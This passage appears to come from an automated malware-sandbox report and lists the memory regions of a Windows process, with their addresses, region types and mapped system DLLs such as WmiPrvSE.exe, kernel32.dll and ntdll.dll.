monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 771 start_va = 0xfb0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 772 start_va = 0x1030000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 773 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 774 start_va = 0x1130000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 775 start_va = 0x11b0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 776 start_va = 0x12b0000 end_va = 0x13affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 777 start_va = 0x13b0000 end_va = 0x14ecfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 778 start_va = 0x14f0000 end_va = 0x156ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014f0000" filename = "" Region: id = 779 start_va = 0x1570000 end_va = 0x1570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001570000" filename = "" Region: id = 780 start_va = 0x1580000 end_va = 0x15fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001580000" filename = "" Region: id = 781 start_va = 0x1600000 end_va = 0x160ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 782 start_va = 0x1610000 end_va = 0x168ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 783 start_va = 0x1690000 end_va = 0x170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 784 start_va = 0x1710000 end_va = 0x1710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001710000" filename = "" Region: id = 785 start_va = 0x1750000 end_va = 0x175ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001750000" filename = "" Region: id = 786 start_va = 0x1760000 end_va = 0x195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001760000" filename = "" Region: id = 787 start_va = 0x1960000 end_va = 0x1b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001960000" filename = "" Region: id = 788 start_va = 0x1b70000 end_va = 0x1d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b70000" filename = "" Region: id = 789 start_va = 0x1d70000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 790 start_va = 0x2170000 end_va = 0x296ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 791 start_va = 0x2970000 end_va = 0x29effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002970000" filename = "" Region: id = 792 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 793 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 794 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 795 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 796 start_va = 0x7ff7732f0000 end_va = 0x7ff77336ffff monitored = 0 entry_point = 0x7ff773305f50 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 797 start_va = 0x7ff827b40000 end_va = 0x7ff827eaefff monitored = 0 entry_point = 0x7ff827c41610 region_type = mapped_file name = "tquery.dll" filename = "\\Windows\\System32\\tquery.dll" (normalized: "c:\\windows\\system32\\tquery.dll") Region: id = 798 start_va = 0x7ff828350000 end_va = 0x7ff828375fff monitored = 0 entry_point = 0x7ff828360d80 region_type = mapped_file name = "wmiaprpl.dll" filename = "\\Windows\\System32\\wbem\\WmiApRpl.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiaprpl.dll") Region: id = 799 start_va = 0x7ff828380000 end_va = 0x7ff828387fff monitored = 0 entry_point = 0x7ff828381e20 region_type = mapped_file name = "usbperf.dll" filename = "\\Windows\\System32\\usbperf.dll" (normalized: "c:\\windows\\system32\\usbperf.dll") Region: id = 800 start_va = 0x7ff828390000 end_va = 0x7ff8283a7fff monitored = 0 entry_point = 0x7ff828391630 region_type = mapped_file name = "utildll.dll" filename = "\\Windows\\System32\\utildll.dll" (normalized: "c:\\windows\\system32\\utildll.dll") Region: id = 801 start_va = 0x7ff8283b0000 end_va = 0x7ff8283b7fff monitored = 0 entry_point = 0x7ff8283b2420 region_type = mapped_file name = "perfts.dll" filename = "\\Windows\\System32\\perfts.dll" (normalized: "c:\\windows\\system32\\perfts.dll") Region: id = 802 start_va = 0x7ff8283c0000 end_va = 0x7ff8283d0fff monitored = 0 entry_point = 0x7ff8283c5840 region_type = mapped_file name = "perfctrs.dll" filename = "\\Windows\\System32\\perfctrs.dll" (normalized: "c:\\windows\\system32\\perfctrs.dll") Region: id = 803 start_va = 0x7ff8283e0000 end_va = 0x7ff8283e7fff monitored = 0 entry_point = 0x7ff8283e18a0 region_type = mapped_file name = "tapiperf.dll" filename = "\\Windows\\System32\\tapiperf.dll" (normalized: "c:\\windows\\system32\\tapiperf.dll") Region: id = 804 start_va = 0x7ff8283f0000 end_va = 0x7ff828417fff monitored = 0 entry_point = 0x7ff8283fc7c0 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 805 start_va = 0x7ff828420000 end_va = 0x7ff828429fff monitored = 0 entry_point = 0x7ff8284231a0 region_type = mapped_file name = "rasctrs.dll" filename = "\\Windows\\System32\\rasctrs.dll" (normalized: "c:\\windows\\system32\\rasctrs.dll") Region: id = 806 start_va = 0x7ff828430000 end_va = 0x7ff82843efff monitored = 0 entry_point = 0x7ff8284359a0 region_type = mapped_file name = "perfproc.dll" filename = "\\Windows\\System32\\perfproc.dll" (normalized: "c:\\windows\\system32\\perfproc.dll") Region: id = 807 start_va = 0x7ff828440000 end_va = 0x7ff828453fff monitored = 0 entry_point = 0x7ff828441310 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 808 start_va = 0x7ff828460000 end_va = 0x7ff82853cfff monitored = 0 entry_point = 0x7ff8284dd590 region_type = mapped_file name = "msdtcprx.dll" filename = "\\Windows\\System32\\msdtcprx.dll" (normalized: "c:\\windows\\system32\\msdtcprx.dll") Region: id = 809 start_va = 0x7ff828540000 end_va = 0x7ff8285a9fff monitored = 0 entry_point = 0x7ff82856e410 region_type = mapped_file name = "mtxclu.dll" filename = "\\Windows\\System32\\mtxclu.dll" (normalized: "c:\\windows\\system32\\mtxclu.dll") Region: id = 810 start_va = 0x7ff8285b0000 end_va = 0x7ff828602fff monitored = 0 entry_point = 0x7ff8285dab30 region_type = mapped_file name = "msdtcuiu.dll" filename = "\\Windows\\System32\\msdtcuiu.dll" (normalized: "c:\\windows\\system32\\msdtcuiu.dll") Region: id = 811 start_va = 0x7ff828610000 end_va = 0x7ff828706fff monitored = 0 entry_point = 0x7ff828634d80 region_type = mapped_file name = "msvcr120_clr0400.dll" filename = "\\Windows\\System32\\msvcr120_clr0400.dll" (normalized: "c:\\windows\\system32\\msvcr120_clr0400.dll") Region: id = 812 start_va = 0x7ff828710000 end_va = 0x7ff8287a7fff monitored = 1 entry_point = 0x7ff828711000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 813 start_va = 0x7ff8287b0000 end_va = 0x7ff828817fff monitored = 1 entry_point = 0x7ff8287b4970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 814 start_va = 0x7ff82b900000 end_va = 0x7ff82b90dfff monitored = 0 entry_point = 0x7ff82b902b10 region_type = mapped_file name = "perfos.dll" filename = "\\Windows\\System32\\perfos.dll" (normalized: "c:\\windows\\system32\\perfos.dll") Region: id = 815 start_va = 0x7ff82b910000 end_va = 0x7ff82b935fff monitored = 1 entry_point = 0x7ff82b91d7fc region_type = mapped_file name = "corperfmonext.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CORPerfMonExt.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\corperfmonext.dll") Region: id = 816 start_va = 0x7ff82c140000 end_va = 0x7ff82c159fff monitored = 0 entry_point = 0x7ff82c1445a0 region_type = mapped_file name = "esentprf.dll" filename = "\\Windows\\System32\\esentprf.dll" (normalized: "c:\\windows\\system32\\esentprf.dll") Region: id = 817 start_va = 0x7ff82caf0000 end_va = 0x7ff82cafafff monitored = 0 entry_point = 0x7ff82caf2e30 region_type = mapped_file name = "perfnet.dll" filename = "\\Windows\\System32\\perfnet.dll" (normalized: "c:\\windows\\system32\\perfnet.dll") Region: id = 818 start_va = 0x7ff82d090000 end_va = 0x7ff82d09ffff monitored = 0 entry_point = 0x7ff82d095870 region_type = mapped_file name = "perfdisk.dll" filename = "\\Windows\\System32\\perfdisk.dll" (normalized: "c:\\windows\\system32\\perfdisk.dll") Region: id = 819 start_va = 0x7ff82d0d0000 end_va = 0x7ff82d0dffff monitored = 0 entry_point = 0x7ff82d0d5b40 region_type = mapped_file name = "msscntrs.dll" filename = "\\Windows\\System32\\msscntrs.dll" (normalized: "c:\\windows\\system32\\msscntrs.dll") Region: id = 820 start_va = 0x7ff832370000 end_va = 0x7ff8323affff monitored = 1 entry_point = 0x7ff83237e3f0 region_type = mapped_file name = "perfcounter.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\PerfCounter.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\perfcounter.dll") Region: id = 821 start_va = 0x7ff8323b0000 end_va = 0x7ff8323fcfff monitored = 0 entry_point = 0x7ff8323bb470 region_type = mapped_file name = "pdh.dll" filename = "\\Windows\\System32\\pdh.dll" (normalized: "c:\\windows\\system32\\pdh.dll") Region: id = 822 start_va = 0x7ff833b40000 end_va = 0x7ff833b4afff monitored = 0 entry_point = 0x7ff833b424e0 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 823 start_va = 0x7ff8372a0000 end_va = 0x7ff8372c5fff monitored = 0 entry_point = 0x7ff8372a1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 824 start_va = 0x7ff837480000 end_va = 0x7ff837495fff monitored = 0 entry_point = 0x7ff8374855e0 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 825 start_va = 0x7ff837620000 end_va = 0x7ff837644fff monitored = 0 entry_point = 0x7ff837629900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 826 start_va = 0x7ff837650000 end_va = 0x7ff837663fff monitored = 0 entry_point = 0x7ff837651800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 827 start_va = 0x7ff837670000 end_va = 0x7ff837765fff monitored = 0 entry_point = 0x7ff8376a9590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 828 start_va = 0x7ff837ca0000 end_va = 0x7ff837cb1fff monitored = 0 entry_point = 0x7ff837ca3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 829 start_va = 0x7ff837cc0000 end_va = 0x7ff837cd0fff monitored = 0 entry_point = 0x7ff837cc2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 830 start_va = 0x7ff837ce0000 end_va = 0x7ff837cfdfff monitored = 0 entry_point = 0x7ff837ce3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 831 start_va = 0x7ff839250000 end_va = 0x7ff839259fff monitored = 0 entry_point = 0x7ff839251350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 832 start_va = 0x7ff839430000 end_va = 0x7ff8394d2fff monitored = 0 entry_point = 0x7ff839432c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 833 start_va = 0x7ff8394e0000 end_va = 0x7ff839531fff monitored = 0 entry_point = 0x7ff8394e5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 834 start_va = 0x7ff839620000 end_va = 0x7ff83969efff monitored = 0 entry_point = 0x7ff839637110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 835 start_va = 0x7ff839700000 end_va = 0x7ff839718fff monitored = 0 entry_point = 0x7ff839704520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 836 start_va = 0x7ff839800000 end_va = 0x7ff83990dfff monitored = 0 entry_point = 0x7ff839867960 region_type = mapped_file name = "sysmain.dll" filename = "\\Windows\\System32\\sysmain.dll" (normalized: "c:\\windows\\system32\\sysmain.dll") Region: id = 837 start_va = 0x7ff839b10000 end_va = 0x7ff839b1bfff monitored = 0 entry_point = 0x7ff839b135c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 838 start_va = 0x7ff83ba30000 end_va = 0x7ff83ba3afff monitored = 0 entry_point = 0x7ff83ba31de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 839 start_va = 0x7ff83bd10000 end_va = 0x7ff83bd4cfff monitored = 0 entry_point = 0x7ff83bd1b760 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Region: id = 840 start_va = 0x7ff83bd50000 end_va = 0x7ff83bd5efff monitored = 0 entry_point = 0x7ff83bd51420 region_type = mapped_file name = "netfxperf.dll" filename = "\\Windows\\System32\\netfxperf.dll" (normalized: "c:\\windows\\system32\\netfxperf.dll") Region: id = 841 start_va = 0x7ff83bd60000 end_va = 0x7ff83bd84fff monitored = 0 entry_point = 0x7ff83bd75dc0 region_type = mapped_file name = "wmiperfclass.dll" filename = "\\Windows\\System32\\wbem\\WmiPerfClass.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiperfclass.dll") Region: id = 842 start_va = 0x7ff83c230000 end_va = 0x7ff83c254fff monitored = 0 entry_point = 0x7ff83c23b320 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\System32\\loadperf.dll" (normalized: "c:\\windows\\system32\\loadperf.dll") Region: id = 843 start_va = 0x7ff83c2a0000 end_va = 0x7ff83c323fff monitored = 0 entry_point = 0x7ff83c2b2830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 844 start_va = 0x7ff83d300000 end_va = 0x7ff83d315fff monitored = 0 entry_point = 0x7ff83d301b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 845 start_va = 0x7ff83d3e0000 end_va = 0x7ff83d3f0fff monitored = 0 entry_point = 0x7ff83d3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 846 start_va = 0x7ff83d570000 end_va = 0x7ff83d582fff monitored = 0 entry_point = 0x7ff83d572760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 847 start_va = 0x7ff83dc80000 end_va = 0x7ff83dcbdfff monitored = 0 entry_point = 0x7ff83dc8a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 848 start_va = 0x7ff83e130000 end_va = 0x7ff83e167fff monitored = 0 entry_point = 0x7ff83e148cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 849 start_va = 0x7ff83f890000 end_va = 0x7ff83f8f3fff monitored = 0 entry_point = 0x7ff83f8a5ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 850 start_va = 0x7ff8413e0000 end_va = 0x7ff841489fff monitored = 0 entry_point = 0x7ff841407910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 851 start_va = 0x7ff841d80000 end_va = 0x7ff841d8bfff monitored = 0 entry_point = 0x7ff841d827e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 852 start_va = 0x7ff841e60000 end_va = 0x7ff841e90fff monitored = 0 entry_point = 0x7ff841e67d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 853 start_va = 0x7ff8422f0000 end_va = 0x7ff842306fff monitored = 0 entry_point = 0x7ff8422f79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 854 start_va = 0x7ff8424a0000 end_va = 0x7ff8424f5fff monitored = 0 entry_point = 0x7ff8424b0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 855 start_va = 0x7ff842500000 end_va = 0x7ff842539fff monitored = 0 entry_point = 0x7ff842508d20 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 856 start_va = 0x7ff842540000 end_va = 0x7ff842566fff monitored = 0 entry_point = 0x7ff842550aa0 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 857 start_va = 0x7ff842800000 end_va = 0x7ff842828fff monitored = 0 entry_point = 0x7ff842814530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 858 start_va = 0x7ff842970000 end_va = 0x7ff8429bafff monitored = 0 entry_point = 0x7ff8429735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 859 start_va = 0x7ff8429c0000 end_va = 0x7ff8429d3fff monitored = 0 entry_point = 0x7ff8429c52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 860 start_va = 0x7ff8429e0000 end_va = 0x7ff8429eefff monitored = 0 entry_point = 0x7ff8429e3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 861 start_va = 0x7ff842a00000 end_va = 0x7ff842a69fff monitored = 0 entry_point = 0x7ff842a36d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 862 start_va = 0x7ff842b60000 end_va = 0x7ff842b76fff monitored = 0 entry_point = 0x7ff842b61390 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 863 start_va = 0x7ff842b80000 end_va = 0x7ff842d67fff monitored = 0 entry_point = 0x7ff842baba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 864 start_va = 0x7ff842e20000 end_va = 0x7ff842e62fff monitored = 0 entry_point = 0x7ff842e34b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 865 start_va = 0x7ff842e70000 end_va = 0x7ff8434b3fff monitored = 0 entry_point = 0x7ff8430364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 866 start_va = 0x7ff843690000 end_va = 0x7ff843744fff monitored = 0 entry_point = 0x7ff8436d22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 867 start_va = 0x7ff843750000 end_va = 0x7ff844caefff monitored = 0 entry_point = 0x7ff8438b11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 868 start_va = 0x7ff844cb0000 end_va = 0x7ff844d5cfff monitored = 0 entry_point = 0x7ff844cc81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 869 start_va = 0x7ff844d60000 end_va = 0x7ff844e7bfff monitored = 0 entry_point = 0x7ff844da02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 870 start_va = 0x7ff844f90000 end_va = 0x7ff8450e5fff monitored = 0 entry_point = 0x7ff844f9a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 871 start_va = 0x7ff845250000 end_va = 0x7ff845257fff monitored = 0 entry_point = 0x7ff845251ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 872 start_va = 0x7ff845260000 end_va = 0x7ff8453e5fff monitored = 0 entry_point = 0x7ff8452affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 873 start_va = 0x7ff845400000 end_va = 0x7ff8454a6fff monitored = 0 entry_point = 0x7ff84540b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 874 start_va = 0x7ff8454b0000 end_va = 0x7ff8458d8fff monitored = 0 entry_point = 0x7ff8454d8740 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 875 start_va = 0x7ff845950000 end_va = 0x7ff8459a1fff monitored = 0 entry_point = 0x7ff84595f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 876 start_va = 0x7ff845a10000 end_va = 0x7ff845a6afff monitored = 0 entry_point = 0x7ff845a238b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 877 start_va = 0x7ff845a70000 end_va = 0x7ff845b16fff monitored = 0 entry_point = 0x7ff845a858d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 878 start_va = 0x7ff845b20000 end_va = 0x7ff845be0fff monitored = 0 entry_point = 0x7ff845b40da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 879 start_va = 0x7ff845da0000 end_va = 0x7ff845e3cfff monitored = 0 entry_point = 0x7ff845da78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 880 start_va = 0x7ff845e50000 end_va = 0x7ff845ebafff monitored = 0 entry_point = 0x7ff845e690c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 881 start_va = 0x7ff845f80000 end_va = 0x7ff8461fcfff monitored = 0 entry_point = 0x7ff846054970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 882 start_va = 0x7ff846200000 end_va = 0x7ff846342fff monitored = 0 entry_point = 0x7ff846228210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 883 start_va = 0x7ff846350000 end_va = 0x7ff846510fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1098 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1099 start_va = 0x400000 end_va = 0x41dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1100 start_va = 0x29f0000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029f0000" filename = "" Region: id = 1101 start_va = 0x420000 end_va = 0x444fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 1102 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1103 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1104 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1105 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1106 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1107 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1108 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1109 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1110 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1111 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1112 start_va = 0x400000 end_va = 0x424fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1113 start_va = 0x400000 end_va = 0x424fff 